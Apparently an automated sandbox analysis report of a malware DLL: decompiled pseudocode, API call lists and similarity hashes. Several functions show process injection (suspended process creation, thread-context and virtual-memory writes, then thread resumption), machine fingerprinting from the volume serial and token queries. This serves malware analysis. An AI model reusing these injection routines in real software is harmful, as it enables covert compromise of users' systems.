                                                                                                                                                                                                								_t87 = E100097ED(0);
                                                                                                                                                                                                								_push(2);
                                                                                                                                                                                                								_v1100 = _t87;
                                                                                                                                                                                                								_t153 = _t188;
                                                                                                                                                                                                								_push(8);
                                                                                                                                                                                                								_v1096 = _t180;
                                                                                                                                                                                                								_push( &_v1100);
                                                                                                                                                                                                								_t181 = 2;
                                                                                                                                                                                                								_t89 = E1000A076(_t153, _t181, _t208);
                                                                                                                                                                                                								_t203 = _t202 + 0xc;
                                                                                                                                                                                                								__eflags = _v1108;
                                                                                                                                                                                                								if(_v1108 == 0) {
                                                                                                                                                                                                									_t153 =  *0x1001e688; // 0x4cb04a0
                                                                                                                                                                                                									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
                                                                                                                                                                                                									if(__eflags != 0) {
                                                                                                                                                                                                										_t90 = E1000FC57(_t89, _t181, _t208, 0, _t130, 0);
                                                                                                                                                                                                										_t203 = _t203 + 0xc;
                                                                                                                                                                                                										goto L26;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									_t153 = _t153 + 0x228;
                                                                                                                                                                                                									goto L25;
                                                                                                                                                                                                								} else {
                                                                                                                                                                                                									_t91 =  *0x1001e688; // 0x4cb04a0
                                                                                                                                                                                                									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
                                                                                                                                                                                                									if(__eflags != 0) {
                                                                                                                                                                                                										L32:
                                                                                                                                                                                                										__eflags =  *(_t91 + 0x1898) & 0x00000082;
                                                                                                                                                                                                										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
                                                                                                                                                                                                											_t183 = 0x64;
                                                                                                                                                                                                											E1000E280(_t183);
                                                                                                                                                                                                										}
                                                                                                                                                                                                										E100052B3( &_v1076, _t208);
                                                                                                                                                                                                										_t190 = _a8;
                                                                                                                                                                                                										_t154 = _t153;
                                                                                                                                                                                                										__eflags = _t190;
                                                                                                                                                                                                										if(_t190 != 0) {
                                                                                                                                                                                                											_t94 =  *0x1001e688; // 0x4cb04a0
                                                                                                                                                                                                											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
                                                                                                                                                                                                											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
                                                                                                                                                                                                												HeapCreate(_t190, _t130, ??); // executed
                                                                                                                                                                                                											} else {
                                                                                                                                                                                                												_t96 = E1000109A(_t154, 0x228);
                                                                                                                                                                                                												_v1100 = _t96;
                                                                                                                                                                                                												lstrcpyW(_t190, _t96);
                                                                                                                                                                                                												E100085B6( &_v1100);
                                                                                                                                                                                                												 *_t203 = "\"";
                                                                                                                                                                                                												lstrcatW(_t190, ??);
                                                                                                                                                                                                												lstrcatW(_t190, _t130);
                                                                                                                                                                                                												lstrcatW(_t190, "\"");
                                                                                                                                                                                                											}
                                                                                                                                                                                                										}
                                                                                                                                                                                                										_t93 = _a12;
                                                                                                                                                                                                										__eflags = _t93;
                                                                                                                                                                                                										if(_t93 != 0) {
                                                                                                                                                                                                											 *_t93 = _v1104;
                                                                                                                                                                                                										}
                                                                                                                                                                                                										_t192 = 0;
                                                                                                                                                                                                										__eflags = 0;
                                                                                                                                                                                                										goto L41;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									_t51 = _t91 + 0x228; // 0x4cb06c8
                                                                                                                                                                                                									_t153 = _t51;
                                                                                                                                                                                                									L25:
                                                                                                                                                                                                									_t90 = E10005532(_t153, _t130, __eflags);
                                                                                                                                                                                                									L26:
                                                                                                                                                                                                									__eflags = _t90;
                                                                                                                                                                                                									if(_t90 >= 0) {
                                                                                                                                                                                                										_t91 =  *0x1001e688; // 0x4cb04a0
                                                                                                                                                                                                										goto L32;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									_push(0xfffffffd);
                                                                                                                                                                                                									L6:
                                                                                                                                                                                                									_pop(_t192);
                                                                                                                                                                                                									goto L41;
                                                                                                                                                                                                								}
                                                                                                                                                                                                							}
                                                                                                                                                                                                							_t106 = E1000C2D4(_v1104, __eflags);
                                                                                                                                                                                                							_v1112 = _t106;
                                                                                                                                                                                                							_t107 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
                                                                                                                                                                                                							__eflags = _t108 - _t192;
                                                                                                                                                                                                							if(_t108 != _t192) {
                                                                                                                                                                                                								_t109 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                								 *((intOrPtr*)(_t109 + 0x30))();
                                                                                                                                                                                                								E100085FB( &_v1148, _t192);
                                                                                                                                                                                                								_t145 = _t108;
                                                                                                                                                                                                								goto L17;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							E100085FB( &_v1144, _t192);
                                                                                                                                                                                                							_t81 = 1;
                                                                                                                                                                                                							goto L42;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t17 = _t75 + 0x1898; // 0x0
                                                                                                                                                                                                						_t116 =  *_t17;
                                                                                                                                                                                                						__eflags = _t116 & 0x00000004;
                                                                                                                                                                                                						if((_t116 & 0x00000004) == 0) {
                                                                                                                                                                                                							__eflags = _t116;
                                                                                                                                                                                                							if(_t116 != 0) {
                                                                                                                                                                                                								goto L12;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							L11:
                                                                                                                                                                                                							E1000E2C8(_v1112, _t175);
                                                                                                                                                                                                							goto L12;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_v1080 = _v1080 & 0x00000000;
                                                                                                                                                                                                						_t118 = E100095C2(_t143, 0x879);
                                                                                                                                                                                                						_v1100 = _t118;
                                                                                                                                                                                                						_t175 = _t118;
                                                                                                                                                                                                						E1000C02E(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
                                                                                                                                                                                                						E100085B6( &_v1100);
                                                                                                                                                                                                						_t200 = _t200 + 0x14;
                                                                                                                                                                                                						goto L11;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_push(0xfffffffe);
                                                                                                                                                                                                					goto L6;
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					_t122 = E10002B97( &_v1044, _t192, 0x105);
                                                                                                                                                                                                					_t206 = _t122;
                                                                                                                                                                                                					if(_t122 == 0) {
                                                                                                                                                                                                						L41:
                                                                                                                                                                                                						_t81 = _t192;
                                                                                                                                                                                                						L42:
                                                                                                                                                                                                						return _t81;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					goto L4;
                                                                                                                                                                                                				}
                                                                                                                                                                                                			}































































                                                                                                                                                                                                0x10004c70
                                                                                                                                                                                                0x10004c75
                                                                                                                                                                                                0x10004c78
                                                                                                                                                                                                0x10004c7d
                                                                                                                                                                                                0x10004ca5
                                                                                                                                                                                                0x10004cab
                                                                                                                                                                                                0x10004cb2
                                                                                                                                                                                                0x10004cc1
                                                                                                                                                                                                0x10004cc6
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004cc6
                                                                                                                                                                                                0x10004cb4
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004c7f
                                                                                                                                                                                                0x10004c7f
                                                                                                                                                                                                0x10004c84
                                                                                                                                                                                                0x10004c8b
                                                                                                                                                                                                0x10004cd0
                                                                                                                                                                                                0x10004cd0
                                                                                                                                                                                                0x10004cd7
                                                                                                                                                                                                0x10004cdb
                                                                                                                                                                                                0x10004cdc
                                                                                                                                                                                                0x10004cdc
                                                                                                                                                                                                0x10004ce6
                                                                                                                                                                                                0x10004ceb
                                                                                                                                                                                                0x10004cee
                                                                                                                                                                                                0x10004cef
                                                                                                                                                                                                0x10004cf1
                                                                                                                                                                                                0x10004cf3
                                                                                                                                                                                                0x10004cf8
                                                                                                                                                                                                0x10004cff
                                                                                                                                                                                                0x10004d42
                                                                                                                                                                                                0x10004d01
                                                                                                                                                                                                0x10004d06
                                                                                                                                                                                                0x10004d0e
                                                                                                                                                                                                0x10004d12
                                                                                                                                                                                                0x10004d1d
                                                                                                                                                                                                0x10004d28
                                                                                                                                                                                                0x10004d30
                                                                                                                                                                                                0x10004d34
                                                                                                                                                                                                0x10004d3c
                                                                                                                                                                                                0x10004d3c
                                                                                                                                                                                                0x10004cff
                                                                                                                                                                                                0x10004d48
                                                                                                                                                                                                0x10004d4b
                                                                                                                                                                                                0x10004d4d
                                                                                                                                                                                                0x10004d53
                                                                                                                                                                                                0x10004d53
                                                                                                                                                                                                0x10004d55
                                                                                                                                                                                                0x10004d55
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004d55
                                                                                                                                                                                                0x10004c8d
                                                                                                                                                                                                0x10004c8d
                                                                                                                                                                                                0x10004c93
                                                                                                                                                                                                0x10004c95
                                                                                                                                                                                                0x10004c9a
                                                                                                                                                                                                0x10004c9a
                                                                                                                                                                                                0x10004c9c
                                                                                                                                                                                                0x10004ccb
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004ccb
                                                                                                                                                                                                0x10004c9e
                                                                                                                                                                                                0x10004ad7
                                                                                                                                                                                                0x10004ad7
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004ad7
                                                                                                                                                                                                0x10004c7d
                                                                                                                                                                                                0x10004b5c
                                                                                                                                                                                                0x10004b6a
                                                                                                                                                                                                0x10004b7d
                                                                                                                                                                                                0x10004b82
                                                                                                                                                                                                0x10004b88
                                                                                                                                                                                                0x10004b8a
                                                                                                                                                                                                0x10004ba2
                                                                                                                                                                                                0x10004ba7
                                                                                                                                                                                                0x10004bb0
                                                                                                                                                                                                0x10004bb6
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004bb6
                                                                                                                                                                                                0x10004b92
                                                                                                                                                                                                0x10004b9b
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004b9b
                                                                                                                                                                                                0x10004afe
                                                                                                                                                                                                0x10004afe
                                                                                                                                                                                                0x10004b04
                                                                                                                                                                                                0x10004b06
                                                                                                                                                                                                0x10004b44
                                                                                                                                                                                                0x10004b46
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004b48
                                                                                                                                                                                                0x10004b4c
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004b4c
                                                                                                                                                                                                0x10004b08
                                                                                                                                                                                                0x10004b12
                                                                                                                                                                                                0x10004b1e
                                                                                                                                                                                                0x10004b29
                                                                                                                                                                                                0x10004b30
                                                                                                                                                                                                0x10004b3a
                                                                                                                                                                                                0x10004b3f
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004b3f
                                                                                                                                                                                                0x10004ad5
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004a59
                                                                                                                                                                                                0x10004a64
                                                                                                                                                                                                0x10004a6a
                                                                                                                                                                                                0x10004a6c
                                                                                                                                                                                                0x10004d57
                                                                                                                                                                                                0x10004d57
                                                                                                                                                                                                0x10004d59
                                                                                                                                                                                                0x10004d5f
                                                                                                                                                                                                0x10004d5f
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004a6c

APIs
Memory Dump Source
• Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
• Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
• Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
• Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
Similarity
• API ID: lstrcat$CreateHeaplstrcpymemset
• String ID:
• API String ID: 2074685370-0
• Opcode ID: f8d1c5f3043776e78a8ad2a2277de3e586b41ff0af61318432064fa9292a9130
• Instruction ID: e7809c0e9bed771dc32917bba83ac72b042db24d80611381e3010ef183b58f35
• Opcode Fuzzy Hash: f8d1c5f3043776e78a8ad2a2277de3e586b41ff0af61318432064fa9292a9130
• Instruction Fuzzy Hash: 4791BCB5604341ABF304DB24CC86F6E73E9EB84390F11892DF9558B299EF70ED448B96
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 94%
E1000B7EA(WCHAR* __ecx, void* __edx) {
	long _v8;
	long _v12;
	WCHAR* _v16;
	short _v528;
	short _v1040;
	short _v1552;
	intOrPtr _t23;
	WCHAR* _t27;
	signed int _t29;
	void* _t33;
	long _t38;
	WCHAR* _t43;
	WCHAR* _t56;

	_t44 = __ecx;
	_v8 = _v8 & 0x00000000;
	_t43 = __edx;
                                                                                                                                                                                                				_t56 = __ecx;
                                                                                                                                                                                                				memset(__edx, 0, 0x100);
                                                                                                                                                                                                				_v12 = 0x100;
                                                                                                                                                                                                				_t23 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                				 *((intOrPtr*)(_t23 + 0xb0))( &_v528,  &_v12);
                                                                                                                                                                                                				lstrcpynW(_t43,  &_v528, 0x100);
                                                                                                                                                                                                				_t27 = E100095C2(_t44, 0xa88);
                                                                                                                                                                                                				_v16 = _t27;
                                                                                                                                                                                                				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
                                                                                                                                                                                                				asm("sbb eax, eax");
                                                                                                                                                                                                				_v8 = _v8 &  ~_t29;
                                                                                                                                                                                                				E100085B6( &_v16);
                                                                                                                                                                                                				_t33 = E1000C3D4(_t43);
                                                                                                                                                                                                				E10009621( &(_t43[E1000C3D4(_t43)]), 0x100 - _t33, L"%u", _v8);
                                                                                                                                                                                                				lstrcatW(_t43, _t56);
                                                                                                                                                                                                				_t38 = E1000C3D4(_t43);
                                                                                                                                                                                                				_v12 = _t38;
                                                                                                                                                                                                				CharUpperBuffW(_t43, _t38);
                                                                                                                                                                                                				return E1000D442(_t43, E1000C3D4(_t43) + _t40, 0);
                                                                                                                                                                                                			}

















                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 1000B807
                                                                                                                                                                                                • lstrcpynW.KERNEL32(?,?,00000100), ref: 1000B831
                                                                                                                                                                                                • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 1000B863
                                                                                                                                                                                                  • Part of subcall function 10009621: _vsnwprintf.MSVCRT ref: 1000963E
                                                                                                                                                                                                • lstrcatW.KERNEL32(?,00000114), ref: 1000B89C
                                                                                                                                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 1000B8AE
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 455400327-0
                                                                                                                                                                                                • Opcode ID: 762bad79624fb650f58724a5ea1e64c263a3eee1a170f4efe313a5a535c72d9b
                                                                                                                                                                                                • Instruction ID: 6fbe4093ac174c6d16cfa6e3d37bce83a44f497b82853686d70f4fe702a36447
                                                                                                                                                                                                • Opcode Fuzzy Hash: 762bad79624fb650f58724a5ea1e64c263a3eee1a170f4efe313a5a535c72d9b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 402183B6A00218BFE710DBA4DC8AFEE77BCEB44250F108169F506D6185EA74AF448B60
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                                                                			E1000CA67(intOrPtr __edx) {
                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                				signed int _v16;
                                                                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                                                                				char _v24;
                                                                                                                                                                                                				void* _v36;
                                                                                                                                                                                                				char _v40;
                                                                                                                                                                                                				char _v80;
                                                                                                                                                                                                				char _t37;
                                                                                                                                                                                                				intOrPtr _t38;
                                                                                                                                                                                                				void* _t45;
                                                                                                                                                                                                				intOrPtr _t47;
                                                                                                                                                                                                				intOrPtr _t48;
                                                                                                                                                                                                				intOrPtr _t50;
                                                                                                                                                                                                				intOrPtr _t52;
                                                                                                                                                                                                				void* _t54;
                                                                                                                                                                                                				intOrPtr _t57;
                                                                                                                                                                                                				long _t61;
                                                                                                                                                                                                				intOrPtr _t62;
                                                                                                                                                                                                				signed int _t65;
                                                                                                                                                                                                				signed int _t68;
                                                                                                                                                                                                				signed int _t82;
                                                                                                                                                                                                				void* _t85;
                                                                                                                                                                                                				char _t86;
                                                                                                                                                                                                
                                                                                                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                				_v20 = __edx;
                                                                                                                                                                                                				_t65 = 0;
                                                                                                                                                                                                				_t37 = E1000C93F( &_v8);
                                                                                                                                                                                                				_t86 = _t37;
                                                                                                                                                                                                				_v24 = _t86;
                                                                                                                                                                                                				_t87 = _t86;
                                                                                                                                                                                                				if(_t86 == 0) {
                                                                                                                                                                                                					return _t37;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t38 =  *0x1001e688; // 0x4cb04a0
                                                                                                                                                                                                				_t7 = _t38 + 0xac; // 0xb8023188
                                                                                                                                                                                                				E1000A8AF( &_v80,  *_t7 + 7, _t87);
                                                                                                                                                                                                				_t82 = _v8;
                                                                                                                                                                                                				_t68 = 0;
                                                                                                                                                                                                				_v16 = 0;
                                                                                                                                                                                                				if(_t82 == 0) {
                                                                                                                                                                                                					L20:
                                                                                                                                                                                                					E100085FB( &_v24, 0);
                                                                                                                                                                                                					return _t65;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				while(_t65 == 0) {
                                                                                                                                                                                                					while(_t65 == 0) {
                                                                                                                                                                                                						asm("stosd");
                                                                                                                                                                                                						asm("stosd");
                                                                                                                                                                                                						asm("stosd");
                                                                                                                                                                                                						asm("stosd");
                                                                                                                                                                                                						_t45 = E1000AEA8( *((intOrPtr*)(_t86 + _t68 * 4)),  &_v40); // executed
                                                                                                                                                                                                						_t92 = _t45;
                                                                                                                                                                                                						if(_t45 >= 0) {
                                                                                                                                                                                                							_t54 = E1000CBB9(E10005CCD,  &_v40, _t92, _v20); // executed
                                                                                                                                                                                                							if(_t54 != 0) {
                                                                                                                                                                                                								_t57 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                								_t85 =  *((intOrPtr*)(_t57 + 0xc4))(0, 0, 0,  &_v80);
                                                                                                                                                                                                								if(_t85 != 0) {
                                                                                                                                                                                                									GetLastError();
                                                                                                                                                                                                									_t61 = ResumeThread(_v36);
                                                                                                                                                                                                									_t62 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                									if(_t61 != 0) {
                                                                                                                                                                                                										_push(0xea60);
                                                                                                                                                                                                										_push(_t85);
                                                                                                                                                                                                										if( *((intOrPtr*)(_t62 + 0x2c))() == 0) {
                                                                                                                                                                                                											_t65 = _t65 + 1;
                                                                                                                                                                                                										}
                                                                                                                                                                                                										_t62 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                									}
                                                                                                                                                                                                									CloseHandle(_t85);
                                                                                                                                                                                                								}
                                                                                                                                                                                                							}
                                                                                                                                                                                                						}
                                                                                                                                                                                                						if(_v40 != 0) {
                                                                                                                                                                                                							if(_t65 == 0) {
                                                                                                                                                                                                								_t52 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                								 *((intOrPtr*)(_t52 + 0x104))(_v40, _t65);
                                                                                                                                                                                                							}
                                                                                                                                                                                                							_t48 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                							 *((intOrPtr*)(_t48 + 0x30))(_v36);
                                                                                                                                                                                                							_t50 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                							 *((intOrPtr*)(_t50 + 0x30))(_v40);
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t68 = _v16;
                                                                                                                                                                                                						_t47 = _v12 + 1;
                                                                                                                                                                                                						_v12 = _t47;
                                                                                                                                                                                                						if(_t47 < 2) {
                                                                                                                                                                                                							continue;
                                                                                                                                                                                                						} else {
                                                                                                                                                                                                							break;
                                                                                                                                                                                                						}
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t82 = _v8;
                                                                                                                                                                                                					_t68 = _t68 + 1;
                                                                                                                                                                                                					_v16 = _t68;
                                                                                                                                                                                                					if(_t68 < _t82) {
                                                                                                                                                                                                						continue;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						break;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					do {
                                                                                                                                                                                                						goto L19;
                                                                                                                                                                                                					} while (_t82 != 0);
                                                                                                                                                                                                					goto L20;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				L19:
                                                                                                                                                                                                				E100085FB(_t86, 0xfffffffe);
                                                                                                                                                                                                				_t86 = _t86 + 4;
                                                                                                                                                                                                				_t82 = _t82 - 1;
                                                                                                                                                                                                			}




























                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 1000AEA8: memset.MSVCRT ref: 1000AEC7
                                                                                                                                                                                                  • Part of subcall function 1000AEA8: CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEE7
                                                                                                                                                                                                  • Part of subcall function 1000CBB9: memset.MSVCRT ref: 1000CBFA
                                                                                                                                                                                                  • Part of subcall function 1000CBB9: GetThreadContext.KERNELBASE(?,00010002,?,00000000,00000000), ref: 1000CC1B
                                                                                                                                                                                                  • Part of subcall function 1000CBB9: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC64
                                                                                                                                                                                                  • Part of subcall function 1000CBB9: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC81
                                                                                                                                                                                                  • Part of subcall function 1000CBB9: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CCA2
                                                                                                                                                                                                  • Part of subcall function 1000CBB9: FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CCB5
                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000001), ref: 1000CB0E
                                                                                                                                                                                                • ResumeThread.KERNELBASE(?,?,00000001), ref: 1000CB1C
                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000,?,00000001), ref: 1000CB3F
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: MemoryVirtual$ProtectThreadmemset$CloseContextCreateErrorFreeHandleLastLibraryProcessResumeWrite
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 255987474-0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                			E1000B9DA(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                				void* _t12;
                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                				void* _t22;
                                                                                                                                                                                                				union _TOKEN_INFORMATION_CLASS _t28;
                                                                                                                                                                                                				void* _t31;
                                                                                                                                                                                                
                                                                                                                                                                                                				_push(_t22);
                                                                                                                                                                                                				_push(_t22);
                                                                                                                                                                                                				_t31 = 0;
                                                                                                                                                                                                				_t28 = __edx;
                                                                                                                                                                                                				_t20 = _t22;
                                                                                                                                                                                                				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                					L6:
                                                                                                                                                                                                					_t12 = _t31;
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					_t31 = E100085E5(_v8);
                                                                                                                                                                                                					_v12 = _t31;
                                                                                                                                                                                                					if(_t31 != 0) {
                                                                                                                                                                                                						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
                                                                                                                                                                                                							goto L6;
                                                                                                                                                                                                						} else {
                                                                                                                                                                                                							E100085FB( &_v12, _t16);
                                                                                                                                                                                                							goto L3;
                                                                                                                                                                                                						}
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						L3:
                                                                                                                                                                                                						_t12 = 0;
                                                                                                                                                                                                					}
                                                                                                                                                                                                				}
                                                                                                                                                                                                				return _t12;
                                                                                                                                                                                                			}











                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74E5F500,00000000,10000000,00000000,00000000,?,1000BA79,?,00000000,?,1000D0EA), ref: 1000B9F5
                                                                                                                                                                                                • GetLastError.KERNEL32(?,1000BA79,?,00000000,?,1000D0EA), ref: 1000B9FC
                                                                                                                                                                                                  • Part of subcall function 100085E5: HeapAlloc.KERNEL32(00000008,?,?,10008F65,00000100,?,10005FAC), ref: 100085F3
                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,1000BA79,?,00000000,?,1000D0EA), ref: 1000BA2B
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: InformationToken$AllocErrorHeapLast
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4258577378-0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 47%
                                                                                                                                                                                                			E1000AEA8(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
                                                                                                                                                                                                				struct _STARTUPINFOW _v72;
                                                                                                                                                                                                				signed int _t11;
                                                                                                                                                                                                				WCHAR* _t15;
                                                                                                                                                                                                				int _t19;
                                                                                                                                                                                                				struct _PROCESS_INFORMATION* _t20;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t20 = __edx;
                                                                                                                                                                                                				_t15 = __ecx;
                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                				_t19 = 0x44;
                                                                                                                                                                                                				memset( &_v72, 0, _t19);
                                                                                                                                                                                                				_v72.cb = _t19;
                                                                                                                                                                                                				_t11 = CreateProcessW(0, _t15, 0, 0, 0, 4, 0, 0,  &_v72, _t20);
                                                                                                                                                                                                				asm("sbb eax, eax");
                                                                                                                                                                                                				return  ~( ~_t11) - 1;
                                                                                                                                                                                                			}









                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 1000AEC7
                                                                                                                                                                                                • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEE7
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateProcessmemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2296119082-0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 47%
                                                                                                                                                                                                			E1000E1FE(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                				char _t5;
                                                                                                                                                                                                				struct HINSTANCE__* _t7;
                                                                                                                                                                                                				void* _t10;
                                                                                                                                                                                                				void* _t12;
                                                                                                                                                                                                				void* _t22;
                                                                                                                                                                                                				void* _t25;
                                                                                                                                                                                                
                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                				_t12 = __ecx;
                                                                                                                                                                                                				_t22 = __edx;
                                                                                                                                                                                                				_t5 = E100095A8(_a4);
                                                                                                                                                                                                				_t25 = 0;
